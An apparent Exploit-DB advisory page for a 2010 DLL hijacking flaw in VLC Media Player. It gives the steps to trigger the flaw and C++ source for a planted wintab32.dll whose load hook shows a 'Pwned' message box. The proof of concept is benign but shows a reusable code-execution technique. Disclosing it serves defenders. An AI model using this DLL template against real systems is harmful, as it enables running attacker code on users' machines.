VLC Player DLL Hijack Vulnerability

vendor:

VLC Media Player

by:

Secfence

7,5

CVSS

HIGH

DLL Hijacking

427

CWE

Product Name: VLC Media Player

Affected Version From: VLC

Affected Version To: VLC

Patch Exists: NO

Related CWE: N/A

CPE: a:videolan:vlc_media_player

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP

2010

VLC Player DLL Hijack Vulnerability

Place a .mp3 file and wintab32.dll in same folder and execute .mp3 file in vlc player. The code for wintab32.dll includes a MessageBox that will display 'Pwned' when the DLL is loaded.

Mitigation:

Ensure that the application is not vulnerable to DLL hijacking by validating the DLLs that are loaded by the application.

Source

Exploit-DB raw data:

Exploit Title: VLC Player DLL Hijack Vulnerability
Date: 25 Aug 2010
Author: Secfence
Version: VLC
Tested on: Windows XP

Place a .mp3 file and wintab32.dll in same folder and execute .mp3 file in
vlc player.

Code for wintab32.dll:

/*----------*/

/* wintab32.cpp */

#include "stdafx.h"
#include "dragon.h"

void init() {
MessageBox(NULL,"Pwned", "Pwned!",0x00000003);
}


BOOL APIENTRY DllMain( HANDLE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
 )
{
    switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
 init();break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
 case DLL_PROCESS_DETACH:
break;
    }
    return TRUE;
}

/*----------*/


Exploit By:
Vinay Katoch
www.secfence.com